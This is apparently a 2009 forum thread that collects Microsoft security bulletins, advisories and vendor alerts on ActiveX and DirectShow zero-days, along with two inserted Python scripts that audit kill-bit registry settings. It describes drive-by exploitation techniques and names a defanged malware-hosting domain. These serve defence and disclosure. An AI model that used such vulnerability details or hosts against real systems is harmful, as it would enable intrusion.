The update includes a kill bit from a previously published Microsoft Cumulative Update:
• Microsoft Visual Basic 6.0 Service Pack 6 Cumulative Update (KB957924)
- http://www.microsoft.com/downloads/details.aspx?FamilyID=cb824e35-0403-45c4-9e41-459f0eb89e36&displaylang=en
The update also includes kill bits for the following third-party software:
• Derivco. This security update sets a kill bit for an ActiveX control developed by Derivco. Derivco has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from Derivco. This kill bit is being set at the request of the owner of the ActiveX controls...
• eBay Advanced Image Upload Component. This security update sets a kill bit for an ActiveX control developed by eBay. eBay has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from eBay. This kill bit is being set at the request of the owner of the ActiveX controls...
• HP Virtual Room v7.0. This security update sets a kill bit for an ActiveX control developed by Research In Motion (RIM). RIM has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from HP. This kill bit is being set at the request of the owner of the ActiveX controls..."

Microsoft Security Advisory (945713)
Vulnerability in Web Proxy Auto-Discovery (WPAD) Could Allow Information Disclosure
- http://www.microsoft.com/technet/security/advisory/945713.mspx
Published: December 3, 2007 | Updated: June 9, 2009 - "... We have issued MS09-008 to address the WPAD issue and have released configuration guidance and updates for DNS devolution in Microsoft Security Advisory 971888. The vulnerabilities addressed are DNS Server Vulnerability in WPAD Registration Vulnerability CVE-2009-0093 and WPAD WINS Server Registration Vulnerability CVE-2009-0094..."
- http://www.microsoft.com/technet/security/Bulletin/MS09-008.mspx
- http://www.microsoft.com/technet/security/advisory/971888.mspx
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0093
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0094

:fear:
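Kill bits such as those in advisory 969898 work by setting the 0x400 bit of the "Compatibility Flags" DWORD under the ActiveX Compatibility registry key for a control's CLSID, which stops Internet Explorer loading that control. The script below is an added example, not code from the post or from Microsoft: it parses a .reg export of that key and reports which CLSIDs are actually kill-bitted, testing the bit with a mask (other flag bits may be set alongside it) and treating an absent subkey or a missing value as not blocked. The CLSIDs in the embedded sample export are constructed placeholders; pass the CLSIDs from the advisory you care about to audit().

```python
"""Audit a .reg export of Internet Explorer's "ActiveX Compatibility" key and
report which CLSIDs carry the kill bit (0x400 in "Compatibility Flags").
Export the key on the target with:
  reg export "HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility" ax.reg
"""
import re

KILL_BIT = 0x00000400   # Compatibility Flags bit that blocks the control in IE

# Accept the native key and the Wow6432Node copy that 32-bit IE uses on x64.
_KEY_RE = re.compile(
    r"^\[(?:HKEY_LOCAL_MACHINE|HKLM)\\SOFTWARE\\(?:Wow6432Node\\)?Microsoft\\"
    r"Internet Explorer\\ActiveX Compatibility\\(\{[0-9A-Fa-f-]{36}\})\]$",
    re.IGNORECASE)
_DWORD_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$', re.IGNORECASE)

# Constructed sample export (placeholder CLSIDs, not real controls):
# one kill-bitted, one present but not blocked, one kill-bitted with an extra flag bit.
SAMPLE_REG = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility]

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{11111111-1111-1111-1111-111111111111}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{22222222-2222-2222-2222-222222222222}]
"Compatibility Flags"=dword:00000000

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\{33333333-3333-3333-3333-333333333333}]
"Compatibility Flags"=dword:00000401
"""


def load_reg(data):
    """Accept str or bytes; reg.exe and regedit write UTF-16 with a BOM."""
    if isinstance(data, bytes):
        if data.startswith((b"\xff\xfe", b"\xfe\xff")):
            return data.decode("utf-16")
        return data.decode("utf-8-sig")
    return data


def parse_compat_flags(reg_text):
    """Map upper-cased CLSID -> Compatibility Flags (None if the subkey exists
    without the value) for every control subkey in the export."""
    flags, current = {}, None
    for line in load_reg(reg_text).splitlines():
        line = line.strip()
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1).upper()
            flags.setdefault(current, None)
            continue
        if line.startswith("["):
            current = None          # some other key: ignore its values
            continue
        m = _DWORD_RE.match(line)
        if m and current:
            flags[current] = int(m.group(1), 16)
    return flags


def is_killbitted(value):
    """Mask test: the kill bit may sit alongside other compatibility flags."""
    return value is not None and (value & KILL_BIT) == KILL_BIT


def audit(reg_text, required_clsids):
    """Return, sorted, the CLSIDs from required_clsids that are NOT kill-bitted."""
    flags = parse_compat_flags(reg_text)
    return sorted(c.upper() for c in required_clsids
                  if not is_killbitted(flags.get(c.upper())))


if __name__ == "__main__":
    wanted = ["{11111111-1111-1111-1111-111111111111}",
              "{22222222-2222-2222-2222-222222222222}",
              "{44444444-4444-4444-4444-444444444444}"]
    for clsid in audit(SAMPLE_REG, wanted):
        print("NOT kill-bitted:", clsid)
```

On x64 Windows, 32-bit Internet Explorer reads the Wow6432Node copy of the key, so export and audit both paths. A subkey that exists with flags 0x00000000 is as unprotected as one that is missing; the kill bit must actually be present in the value.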

AplusWebMaster
2009-06-20, 02:48
FYI...

DirectShow Exploit In the Wild, Part II
- http://preview.tinyurl.com/lhmtkd
06-19-2009 Symantec Security Response Blog - "... With no patch for this vulnerability available as of yet, the fact that we are seeing this exploit used more commonly in the wild is worrying... To trigger this vulnerability, attackers are currently enticing users to visit a malicious page. Attackers have become quite adept at doing this by embedding iframe tags in legitimate pages, among other techniques. This is the most likely attack vector. We have seen iframe tags pointing to this exploit inside phishing pages already and we do expect to see iframe tags added to more pages. The vulnerability exists in the code within Microsoft DirectX and can be triggered by a specially crafted QuickTime media file. The attacker’s Web page will try to play the malicious QuickTime file, not using the QuickTime player, but using Windows Media Player instead. This will trigger the vulnerability and allow the attacker to execute code on the visitor’s computer. The vulnerable code exists in quartz.dll and is a null-byte overwrite. It allows the attacker to overwrite just one byte of memory with a null byte... (end-user) work-around*."
* http://support.microsoft.com/kb/971778#FixItForMeAlways
June 3, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

- http://www.microsoft.com/technet/security/advisory/971778.mspx

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1537
Last revised: 06/09/2009
CVSS v2 Base Score: 9.3 (HIGH)
Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service...

:fear::mad:

AplusWebMaster
2009-07-06, 15:18
FYI...

0-day in MS DirectShow (msvidctl.dll) used in drive-by attacks
- http://isc.sans.org/diary.html?storyid=6733
Last Updated: 2009-07-06 08:56:55 UTC - "A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites. Please keep a watchful eye on your AV and IDS/IPS vendors updates to ensure coverage as early as possible on this exploit as it is likely to be widely deployed with the code being available. A valid work around for the attack vector is available which sets the kill bit on the vulnerable DLL.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400 ..."

- http://securitylabs.websense.com/content/Alerts/3432.aspx
07.06.2009 - "Websense... is currently tracking -legitimate- sites that have been compromised to lead to a zero-day exploit targeting an Internet Explorer vulnerability. The compromised sites lead to a handful of payload sites hosting the exploit code which targets msvidctl.dll - an ActiveX control for streaming video. The new zero-day exploit has been added to other exploits on Chinese payload sites. We have been monitoring these sites, which have been systematically injected throughout the last year..."

- http://secunia.com/advisories/35683/2/
Release Date: 2009-07-06
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
OS: Microsoft Windows XP Home Edition, Microsoft Windows XP Professional ...
... The vulnerability is caused due to a boundary error in the ActiveX control for streaming video (msvidctl.dll) and can be exploited to cause a stack-based buffer overflow via specially crafted image content.
Successful exploitation allows execution of arbitrary code when a user e.g. visits a malicious website.
NOTE: The vulnerability is currently being actively exploited...
Solution: Set the kill-bit for the affected ActiveX control...

- http://www.f-secure.com/weblog/archives/00001716.html
July 6, 2009 - "... The exploit targets Microsoft Internet Explorer… so one work around is kind of obvious. Use some other browser besides Internet Explorer until this vulnerability is patched..."

>>> http://support.microsoft.com/kb/972890#FixItForMe
July 6, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

:fear:

AplusWebMaster
2009-07-06, 22:20
FYI...

Microsoft Security Advisory (972890)
Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/972890.mspx
July 06, 2009 - "Microsoft is investigating a privately reported vulnerability in Microsoft Video ActiveX Control. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. When using Internet Explorer, code execution is remote and may not require any user intervention. We are aware of attacks attempting to exploit the vulnerability.
Our investigation has shown that there are no by-design uses for this ActiveX Control in Internet Explorer which includes all of the Class Identifiers within the msvidctl.dll that hosts this ActiveX Control. For Windows XP and Windows Server 2003 customers, Microsoft is recommending removing support for this ActiveX Control within Internet Explorer using all the Class Identifiers listed in the Workaround section. Though unaffected by this vulnerability, Microsoft is recommending that Windows Vista and Windows Server 2008 customers remove support for this ActiveX Control within Internet Explorer using the same Class Identifiers as a defense-in-depth measure. Customers may prevent the Microsoft Video ActiveX Control from running in Internet Explorer, either manually using the instructions in the Workaround section or automatically using the solution found in Microsoft Knowledge Base Article 972890*..."
* http://support.microsoft.com/kb/972890#FixItForMe
July 6, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0015
Last revised: 07/09/2009
CVSS v2 Base Score: 9.3 (HIGH)
Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service ...

- http://securitylabs.websense.com/content/Blogs/3434.aspx
07.09.2009

:fear:

AplusWebMaster
2009-07-07, 13:14
FYI...

IE 0day exploit domains...
- http://isc.sans.org/diary.html?storyid=6739
Last Updated: 2009-07-07 02:33:54 UTC - "This diary entry contains a list of domains that are exploiting the new IE-0day as well as secondary domains that are hosting potentially malicious binaries utilized in these attacks. This list has been produced as a combined effort of researchers, vendors, and volunteers. You can thank the groups below for their efforts and their willingness to share this information with the public. This list is intended to serve as a quick way to provide protection against these attacks by identifying domains that are hosting these (and potentially other) exploits. This list is not formatted for any specific file format, it is up to you the reader to translate this data into the proper formatting that your environment requires... The information provided has had varying degrees of verification performed on it. As such this information is provided as is. There may very well be mistakes, mistakes that may result in legitimate sites being blocked if you choose to use this list as a block list..."

:fear:

AplusWebMaster
2009-07-07, 15:40
FYI...

0-day exploit leads to KILLAV
- http://blog.trendmicro.com/zero-day-microsoft-directshow-mpeg2tunerequest-exploit-leads-to-killav-malware/
July 6, 2009 - "... Around 967 Chinese websites are reported to be infected by a malicious script that leads users to successive site redirections and lands them to download a .JPG file containing the exploit. Trend Micro detects it as JS_DLOADER.BD... Upon successful exploitation, the script downloads another malware detected as WORM_KILLAV.AI. This malware disables and terminates antivirus software processes, and drops other malware on the affected system..."
(Screenshots available at the URL above.)

Edit/update - see: http://secunia.com/advisories/35683/2/
Last Update: 2009-07-14
Solution Status: Vendor Patch
MS09-032 (KB973346):
http://www.microsoft.com/technet/security/Bulletin/MS09-032.mspx ...

:fear::spider::fear:

AplusWebMaster
2009-07-10, 00:05
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-jul.mspx
July 09, 2009 - "This is an advance notification of security bulletins that Microsoft is intending to release on July 14, 2009... (Total of -6-)

Critical -3-

Windows 1
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Windows 2
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Windows 3
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Important -3-

VPC/VS
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Virtual PC, Virtual Server...

ISA
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft ISA Server...

Publisher
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

AplusWebMaster
2009-07-13, 18:33
FYI...

Microsoft Security Advisory (973472)
Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973472.mspx
July 13, 2009 - "Microsoft is investigating a privately reported vulnerability in Microsoft Office Web Components. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. When using Internet Explorer, code execution is remote and may not require any user intervention. We are aware of attacks attempting to exploit the vulnerability. Customers may prevent the Microsoft Office Web Components from running in Internet Explorer either manually, using the instructions in the Workaround section, or automatically, using the solution found in Microsoft Knowledge Base Article 973472*..."
* http://support.microsoft.com/kb/973472#FixItForMe
July 13, 2009 - Revision: 1.2

- http://secunia.com/advisories/35800/2/
Release Date: 2009-07-13
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Solution: Set the kill-bit for the affected ActiveX control.
Provided and/or discovered by: Reported as a 0-day...

- http://isc.sans.org/diary.html?storyid=6778
Last Updated: 2009-07-14 01:35:23 UTC ...(Version: 8) - "... This vulnerability exists in the ActiveX control used by IE to display Excel spreadsheets... we are seeing active exploit pages... Start working on this ASAP. The impact is remote code execution with the privileges of the logged in user running Internet Explorer, and might not require user intervention. As in browse to a nasty web site and be pwn3d..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1136

:fear:

AplusWebMaster
2009-07-14, 21:29
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-jul.mspx
July 14, 2009 - "This bulletin summary lists security bulletins released for July 2009...
(Total of -6-)

Critical -3-

Microsoft Security Bulletin MS09-029
Vulnerabilities in the Embedded OpenType Font Engine Could Allow Remote Code Execution (961371)
- http://www.microsoft.com/technet/security/bulletin/MS09-029.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-028
Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (971633)
- http://www.microsoft.com/technet/security/bulletin/MS09-028.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-032
Cumulative Security Update of ActiveX Kill Bits (973346)
- http://www.microsoft.com/technet/security/bulletin/MS09-032.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Important -3-

Microsoft Security Bulletin MS09-033
Vulnerability in Virtual PC and Virtual Server Could Allow Elevation of Privilege (969856)
- http://www.microsoft.com/technet/security/bulletin/MS09-033.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Virtual PC, Virtual Server...

Microsoft Security Bulletin MS09-031
Vulnerability in Microsoft ISA Server 2006 Could Cause Elevation of Privilege (970953)
- http://www.microsoft.com/technet/security/bulletin/MS09-031.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft ISA Server...

Microsoft Security Bulletin MS09-030
Vulnerability in Microsoft Publisher Could Allow Remote Code Execution (969516)
- http://www.microsoft.com/technet/security/bulletin/MS09-030.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6790
Last Updated: 2009-07-14 17:34:08 UTC - "...MS09-032 - Note there are recently discovered killbits one should set that are -not- included in this update..." (See: http://support.microsoft.com/kb/973472#FixItForMe - July 14, 2009)
___

MSRT
- http://support.microsoft.com/?kbid=890830
Release Date: July 14, 2009
(Recent additions)
Win32/Winwebsec May 2009 (V 2.10) Moderate
Win32/InternetAntivirus June 2009 (V 2.11) Moderate
Win32/FakeSpypro July 2009 (V 2.12) Moderate

AplusWebMaster
2009-07-16, 12:58
FYI...

Microsoft Security Bulletin MS09-032 - Critical
Cumulative Security Update of ActiveX Kill Bits (973346)
- http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx
Published: July 14, 2009 | Updated: July 15, 2009
"... Frequently Asked Questions (FAQ) Related to This Security Update
If I have applied the workaround from Microsoft Security Advisory 972890, do I need to install this security update?
Microsoft Security Advisory 972890 describes a workaround that prevents the Microsoft Video ActiveX Control from running in Internet Explorer. Customers can either manually apply this workaround or use the automated Microsoft Fix it solution in Microsoft Knowledge Base Article 972890 to enable the workaround. Customers who have applied this workaround using either method do -not- need to install this security update.
... Customers who want this update to be offered to Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems must remove the kill bit settings previously applied by the workaround by deleting the registry keys referenced in the workaround, "Prevent COM objects from running in Internet Explorer."
• V1.1 (July 15, 2009): Clarified a FAQ about the workaround from Microsoft Security Advisory 972890, added a FAQ about Microsoft Security Advisory 973472, and added a FAQ about the kill bits contained in this bulletin.

- http://windowssecrets.com/2009/07/16/07-Killbit-update-requires-Fix-it-undo-for-XP-PCs
July 16, 2009 - "... Anyone who applied the Fix-it workaround won't see the cumulative patch among the updates being offered to XP systems because the workaround removed the affected Registry keys."
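Added example (not from this thread, Microsoft, or the ISC diary): the kill-bit workaround quoted in the 2009-07-06 post above is just a "Compatibility Flags" DWORD with bit 0x400 set under the ActiveX Compatibility key, and the MS09-032 FAQ quoted here says those same keys have to be removed before the update is offered. The script below audits a `.reg` export of that key (from `reg export`, saved as text) and reports, for the CLSIDs you care about, whether the kill bit is present. The `.reg` content embedded here is constructed sample data, not a real export; the only real CLSID in it is the msvidctl.dll one from the ISC snippet, the other two are made up. Accepting the Wow6432Node path (where 32-bit IE on 64-bit Windows reads its list) is an assumption about your export, not something the thread states.

```python
"""Audit ActiveX kill bits from a .reg export of the ActiveX Compatibility key.

Kill bit = bit 0x400 of the "Compatibility Flags" DWORD under
HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}.
"""
import re

KILL_BIT = 0x00000400  # the "Compatibility Flags" bit that blocks the control in IE

# Constructed sample standing in for `reg export` output (a real export is
# UTF-16LE; open it with encoding="utf-16" before passing the text in).
# Only the first CLSID is real (msvidctl.dll, from MS advisory 972890);
# the other two are made-up placeholders.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{11111111-2222-3333-4444-555555555555}]
"Compatibility Flags"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{66666666-7777-8888-9999-AAAAAAAAAAAA}]
"Compatibility Flags"=dword:00000404
"""

# Key header for one CLSID subkey; Wow6432Node is optional (32-bit IE on x64 is an assumption).
KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SOFTWARE\\(?:Wow6432Node\\)?Microsoft\\Internet Explorer\\"
    r"ActiveX Compatibility\\(\{[0-9A-Fa-f-]{36}\})\]$",
    re.IGNORECASE,
)
VAL_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$', re.IGNORECASE)


def parse_activex_compat(reg_text):
    """Return {CLSID: flags} for every ActiveX Compatibility subkey in the export.

    A subkey that exists but carries no "Compatibility Flags" value is
    recorded with flags 0, so it shows up as "kill bit not set".
    """
    flags = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1).upper()
            flags.setdefault(current, 0)
            continue
        if line.startswith("["):
            current = None  # some unrelated key; ignore its values
            continue
        m = VAL_RE.match(line)
        if m and current is not None:
            flags[current] = int(m.group(1), 16)
    return flags


def killbit_status(reg_text, clsids):
    """Map each requested CLSID to True if its kill bit is set, else False."""
    flags = parse_activex_compat(reg_text)
    return {c.upper(): bool(flags.get(c.upper(), 0) & KILL_BIT) for c in clsids}


def missing_killbits(reg_text, clsids):
    """CLSIDs from the list whose kill bit is absent (key missing or bit clear)."""
    return sorted(c for c, ok in killbit_status(reg_text, clsids).items() if not ok)


if __name__ == "__main__":
    wanted = ["{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}",
              "{11111111-2222-3333-4444-555555555555}"]
    for clsid, ok in killbit_status(SAMPLE_REG, wanted).items():
        print(clsid, "kill bit SET" if ok else "kill bit NOT set")
```

To run it against a real machine, export the key with `reg export "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility" ax.reg`, read the file as UTF-16 and pass the text to `killbit_status` with the CLSIDs from the advisory you are checking. A CLSID reported as set is one of the keys the MS09-032 FAQ says must be deleted before Windows Update will offer the cumulative kill-bit update on XP/2003; a CLSID reported as not set is one the workaround has not covered.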

AplusWebMaster
2009-07-25, 10:14
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx
July 24, 2009 - "This is an advance notification of two out-of-band security bulletins that Microsoft is intending to release on July 28, 2009. One bulletin will be for the Microsoft Visual Studio product line; application developers should be aware of updates available affecting certain types of applications. The second bulletin contains defense-in-depth changes to Internet Explorer to address attack vectors related to the Visual Studio bulletin, as well as fixes for unrelated vulnerabilities that are rated Critical...

Internet Explorer
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer...

Visual Studio
Maximum Severity Rating: Moderate
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Visual Studio...

AplusWebMaster
2009-07-28, 02:11
FYI...

MS OWC vuln used in site compromise
- http://securitylabs.websense.com/content/Alerts/3451.aspx
07.27.2009 - "Websense... has discovered that the Center for Defense Information (CDI) Web site has been compromised. The site is injected with a JavaScript code that exploits the latest Microsoft Office Web Components Control vulnerability... The vulnerability is in the Internet Explorer ActiveX control used to display Excel spreadsheets (CVE-2009-1136)... The exploit code pushes a Trojan from hxxp ://vicp .cc/. The Trojan has more than 50% detection*. Note that Microsoft provides a workaround for the problem in their Fixit** program..."

* http://www.virustotal.com/analisis/0ef75757f2f8e8a4ea1aa4288d52eb2deb8b9df804af33da9f0ef3baee60138c-1248724806
File solar.exe received on 2009.07.27 20:00:06 (UTC)
Result: 24/41 (58.54%)

** http://support.microsoft.com/kb/973472#FixItForMe

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1136
Last revised: 07/16/2009
CVSS v2 Base Score: 9.3 (HIGH)

:mad:

AplusWebMaster
2009-07-28, 20:38
FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
July 28, 2009 - "Microsoft is releasing this security advisory to provide information about our ongoing investigation into vulnerabilities in the public and private versions of Microsoft's Active Template Library (ATL). This advisory also provides guidance as to what developers can do to help ensure that the controls and components they have built are not vulnerable to the ATL issues; what IT Professionals and consumers can do to mitigate potential attacks that use the vulnerabilities; and what Microsoft is doing as part of its ongoing investigation into the issue described in this advisory. This security advisory will also provide a comprehensive listing of all Microsoft Security Bulletins and Security Updates related to the vulnerabilities in ATL. Microsoft's investigation into the private and public versions of ATL is ongoing, and we will release security updates and guidance as appropriate as part of the investigation process...
Updates related to ATL: Updates released on July 28, 2009...

Microsoft Security Bulletin MS09-034 - Critical
Cumulative Security Update for Internet Explorer (972260)
- http://www.microsoft.com/technet/security/bulletin/ms09-034.mspx
July 28, 2009

Microsoft Security Bulletin MS09-035 - Moderate
Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution (969706)
- http://www.microsoft.com/technet/security/bulletin/ms09-035.mspx
July 28, 2009

- http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx
• V2.0 (July 28, 2009): Added Microsoft Security Bulletins MS09-034, Cumulative Security Update for Internet Explorer (972260), and MS09-035, Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution (969706). Also added the bulletin webcast links for these out-of-band security bulletins.
___

- http://isc.sans.org/diary.html?storyid=6874
Last Updated: 2009-07-28 17:19:30 UTC ...(Version: 2)
___

- http://secunia.com/advisories/35962/2/
Release Date: 2009-07-28
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: Microsoft Internet Explorer v5 - v8 ...
Solution: Apply patches...
Original Advisory: MS09-034 (KB972260):
http://www.microsoft.com/technet/security/Bulletin/MS09-034.mspx
Other References: Microsoft Security Advisory (KB973882):
http://www.microsoft.com/technet/security/advisory/973882.mspx ...

- http://secunia.com/advisories/35967/2/
Release Date: 2009-07-28
Critical: Moderately critical
Impact: System access, Exposure of sensitive information, Security Bypass
Where: From remote
Solution Status: Vendor Patch
Software: Microsoft Visual C++ (multiple versions), Microsoft Visual Studio (multiple versions)...
Original Advisory: MS09-035 (KB969706, KB971089, KB971090, KB971091, KB971092, KB973544, KB973551, KB973552, KB973830):
http://www.microsoft.com/technet/security/Bulletin/MS09-035.mspx ...

- http://www.sophos.com/blogs/sophoslabs/v/post/5627
July 28, 2009 - "...MS09-035 fixes the actual ATL code included with several versions of Microsoft Visual Studio so that the new ActiveX components compiled with the fixed ATL code are not affected by the incorrect pointer passing vulnerability in CComVariant::ReadFromStream function. Developers of ActiveX components that use ATL are advised to recompile and update their components using the fixed version of the Active Template Library...."

AplusWebMaster
2009-08-11, 20:41
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-aug.mspx
August 11, 2009 - "This bulletin summary lists security bulletins released for August 2009... (Total of -9-)

Critical -5-

Microsoft Security Bulletin MS09-043
Vulnerabilities in Microsoft Office Web Components Could Allow Remote Code Execution (957638)
- http://www.microsoft.com/technet/security/bulletin/ms09-043.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office, Microsoft Visual Studio, Microsoft ISA Server, Microsoft BizTalk Server...

Microsoft Security Bulletin MS09-044
Vulnerabilities in Remote Desktop Connection Could Allow Remote Code Execution (970927)
- http://www.microsoft.com/technet/security/bulletin/MS09-044.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Remote Desktop Connection Client for Mac...

Microsoft Security Bulletin MS09-039
Vulnerabilities in WINS Could Allow Remote Code Execution (969883)
- http://www.microsoft.com/technet/security/bulletin/MS09-039.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-038
Vulnerabilities in Windows Media File Processing Could Allow Remote Code Execution (971557)
- http://www.microsoft.com/technet/security/bulletin/MS09-038.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-037
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution (973908)
- http://www.microsoft.com/technet/security/bulletin/MS09-037.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Important -4-

Microsoft Security Bulletin MS09-041
Vulnerability in Workstation Service Could Allow Elevation of Privilege (971657)
- http://www.microsoft.com/technet/security/bulletin/MS09-041.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-040
Vulnerability in Message Queuing Could Allow Elevation of Privilege (971032)
- http://www.microsoft.com/technet/security/bulletin/MS09-040.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-036
Vulnerability in ASP.NET in Microsoft Windows Could Allow Denial of Service (970957)
- http://www.microsoft.com/technet/security/bulletin/MS09-036.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Does not require restart
Affected Software: Microsoft Windows, Microsoft .NET Framework...

Microsoft Security Bulletin MS09-042
Vulnerability in Telnet Could Allow Remote Code Execution (960859)
- http://www.microsoft.com/technet/security/bulletin/MS09-042.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
___

Severity and Exploitability Index (chart)
- http://blogs.technet.com/photos/msrcteam/images/3272462/original.aspx
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6937
Last Updated: 2009-08-11 19:22:14 UTC
___

MSRT
- http://support.microsoft.com/?kbid=890830
Release Date: 8/11/2009
(Recent additions)
Win32/InternetAntivirus June 2009 (V 2.11) Moderate
Win32/FakeSpypro July 2009 (V 2.12) Moderate
Win32/FakeRean August 2009 (V 2.13) Moderate

AplusWebMaster
2009-08-12, 14:21
FYI...

Microsoft Security Advisory (973882)
